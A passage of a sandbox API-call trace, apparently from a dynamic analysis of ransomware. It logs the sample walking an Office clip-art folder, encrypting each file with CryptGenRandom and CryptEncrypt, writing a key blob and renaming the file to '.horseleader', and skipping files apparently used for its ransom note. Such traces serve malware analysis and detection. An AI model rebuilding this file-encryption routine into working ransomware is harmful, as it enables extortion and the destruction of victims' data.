Office\\CLIPART\\PUB60COR\\BS00438_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.horseleader")) returned 1 [0253.704] GetProcessHeap () returned 0x780000 [0253.704] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.704] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x276b5e00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x276b5e00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x804, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00439_.WMF", cAlternateFileName="")) returned 1 [0253.704] lstrcmpiW (lpString1="BS00439_.WMF", lpString2="Windows") returned -1 [0253.704] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 67 [0253.704] StrStrIW (lpFirst="BS00439_.WMF", lpSrch=".horseleader") returned 0x0 [0253.704] lstrcmpW (lpString1="BS00439_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.704] lstrcmpW (lpString1="BS00439_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.704] lstrlenW (lpString=".testttjffg") returned 11 [0253.704] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.704] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.705] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.706] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 67 [0253.706] StrStrW (lpFirst="BS00439_.WMF", lpSrch=".txt") returned 0x0 [0253.706] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2052) returned 1 [0253.706] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x804, lpOverlapped=0x0) returned 1 [0253.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7fc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.708] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x804, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x804, lpOverlapped=0x0) returned 1 [0253.709] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.709] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.709] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.709] CloseHandle (hObject=0x158) returned 1 [0253.709] GetProcessHeap () returned 0x780000 [0253.709] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.709] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.horseleader") returned 79 [0253.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00439_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00439_.wmf.horseleader")) returned 1 [0253.710] GetProcessHeap () returned 0x780000 [0253.710] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.710] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x263a3100, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x263a3100, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x15cc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00440_.WMF", cAlternateFileName="")) returned 1 [0253.710] lstrcmpiW (lpString1="BS00440_.WMF", lpString2="Windows") returned -1 [0253.710] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 67 [0253.710] StrStrIW (lpFirst="BS00440_.WMF", lpSrch=".horseleader") returned 0x0 [0253.710] lstrcmpW (lpString1="BS00440_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.710] lstrcmpW (lpString1="BS00440_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.710] lstrlenW (lpString=".testttjffg") returned 11 [0253.710] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.710] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.710] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.710] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.711] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 67 [0253.711] StrStrW (lpFirst="BS00440_.WMF", lpSrch=".txt") returned 0x0 [0253.711] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5580) returned 1 [0253.711] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x15cc, lpOverlapped=0x0) returned 1 [0253.712] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffea34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.713] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x15cc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x15cc, lpOverlapped=0x0) returned 1 [0253.713] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.713] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.713] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.713] CloseHandle (hObject=0x158) returned 1 [0253.713] GetProcessHeap () returned 0x780000 [0253.713] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.713] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.horseleader") returned 79 [0253.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf.horseleader")) returned 1 [0253.714] GetProcessHeap () returned 0x780000 [0253.714] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.714] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25090400, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x25090400, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00441_.WMF", cAlternateFileName="")) returned 1 [0253.714] lstrcmpiW (lpString1="BS00441_.WMF", lpString2="Windows") returned -1 [0253.714] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 67 [0253.714] StrStrIW (lpFirst="BS00441_.WMF", lpSrch=".horseleader") returned 0x0 [0253.714] lstrcmpW (lpString1="BS00441_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.714] lstrcmpW (lpString1="BS00441_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.714] lstrlenW (lpString=".testttjffg") returned 11 [0253.714] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.714] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.714] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.714] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.715] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned 67 [0253.715] StrStrW (lpFirst="BS00441_.WMF", lpSrch=".txt") returned 0x0 [0253.715] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3524) returned 1 [0253.715] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xdc4, lpOverlapped=0x0) returned 1 [0253.717] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff23c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.717] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xdc4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xdc4, lpOverlapped=0x0) returned 1 [0253.717] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.717] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.717] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.717] CloseHandle (hObject=0x158) returned 1 [0253.717] GetProcessHeap () returned 0x780000 [0253.717] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.717] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.horseleader") returned 79 [0253.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf.horseleader")) returned 1 [0253.718] GetProcessHeap () returned 0x780000 [0253.718] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.718] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d7d700, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x23d7d700, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00442_.WMF", cAlternateFileName="")) returned 1 [0253.718] lstrcmpiW (lpString1="BS00442_.WMF", lpString2="Windows") returned -1 [0253.718] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 67 [0253.718] StrStrIW (lpFirst="BS00442_.WMF", lpSrch=".horseleader") returned 0x0 [0253.718] lstrcmpW (lpString1="BS00442_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.718] lstrcmpW (lpString1="BS00442_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.718] lstrlenW (lpString=".testttjffg") returned 11 [0253.719] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.719] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.719] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.719] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned 67 [0253.720] StrStrW (lpFirst="BS00442_.WMF", lpSrch=".txt") returned 0x0 [0253.720] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2488) returned 1 [0253.720] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x9b8, lpOverlapped=0x0) returned 1 [0253.721] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff648, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.721] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x9b8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x9b8, lpOverlapped=0x0) returned 1 [0253.722] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.722] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.722] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.722] CloseHandle (hObject=0x158) returned 1 [0253.722] GetProcessHeap () returned 0x780000 [0253.722] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.722] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.horseleader") returned 79 [0253.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf.horseleader")) returned 1 [0253.723] GetProcessHeap () returned 0x780000 [0253.723] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.723] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb7ffa00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbb7ffa00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x68c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00443_.WMF", cAlternateFileName="")) returned 1 [0253.723] lstrcmpiW (lpString1="BS00443_.WMF", lpString2="Windows") returned -1 [0253.723] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 67 [0253.723] StrStrIW (lpFirst="BS00443_.WMF", lpSrch=".horseleader") returned 0x0 [0253.723] lstrcmpW (lpString1="BS00443_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.723] lstrcmpW (lpString1="BS00443_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.723] lstrlenW (lpString=".testttjffg") returned 11 [0253.723] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.723] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.723] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 67 [0253.724] StrStrW (lpFirst="BS00443_.WMF", lpSrch=".txt") returned 0x0 [0253.724] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1676) returned 1 [0253.724] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x68c, lpOverlapped=0x0) returned 1 [0253.727] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff974, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.727] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x68c, lpOverlapped=0x0) returned 1 [0253.727] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.727] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.728] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.728] CloseHandle (hObject=0x158) returned 1 [0253.728] GetProcessHeap () returned 0x780000 [0253.728] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.728] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.horseleader") returned 79 [0253.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00443_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00443_.wmf.horseleader")) returned 1 [0253.729] GetProcessHeap () returned 0x780000 [0253.729] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.729] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22a6aa00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22a6aa00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xf38, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS00444_.WMF", cAlternateFileName="")) returned 1 [0253.729] lstrcmpiW (lpString1="BS00444_.WMF", lpString2="Windows") returned -1 [0253.729] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 67 [0253.729] StrStrIW (lpFirst="BS00444_.WMF", lpSrch=".horseleader") returned 0x0 [0253.729] lstrcmpW (lpString1="BS00444_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.729] lstrcmpW (lpString1="BS00444_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.729] lstrlenW (lpString=".testttjffg") returned 11 [0253.729] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.729] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.730] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00444_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.731] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00444_.WMF") returned 67 [0253.731] StrStrW (lpFirst="BS00444_.WMF", lpSrch=".txt") returned 0x0 [0253.731] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3896) returned 1 [0253.731] ReadFile (in: hFile=0x158, 